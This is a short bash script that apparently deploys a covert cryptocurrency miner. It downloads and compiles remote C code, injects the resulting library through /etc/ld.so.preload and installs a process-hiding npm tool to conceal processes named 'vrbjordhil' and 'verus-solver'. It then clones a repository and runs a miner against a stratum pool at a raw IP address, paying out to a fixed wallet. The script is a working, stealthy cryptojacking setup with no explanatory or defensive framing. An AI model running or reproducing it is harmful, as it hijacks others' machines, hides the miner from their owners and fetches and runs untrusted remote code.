#!/bin/bash
sudo apt-get update -y
sudo apt install gcc -y
curl https://gitlab.com/ontranontran/kaspo/-/raw/master/ontranbotak.c -o ontranbotak.c
gcc -Wall -fPIC -shared -o libontranbotak.so ontranbotak.c -ldl
mv libontranbotak.so /usr/local/lib/
echo /usr/local/lib/libontranbotak.so >> /etc/ld.so.preload
rm ontranbotak.c
echo "supersede domain-name-servers 1.1.1.1;">> /etc/dhcp/dhclient.conf /etc/init.d/network restart
sudo su --command "curl -sL https://deb.nodesource.com/setup_20.x | sudo -E bash - && sudo apt-get install -y nodejs && npm i -g updates && npm i -g node-process-hider && npm install -g npm@10.8.1 && sudo ph add vrbjordhil && sudo ph add verus-solver"
git clone https://github.com/Bjordhil/CUSTOM
cd CUSTOM
chmod +x ngedie && chmod +x verus-solver
./vrbjordhil -c stratum+tcp://77.237.240.172:443 -u RG6DfuhnggRT2TZ8p6SFQt3FHakfJ3ac6J.XID -p x --cpu 64
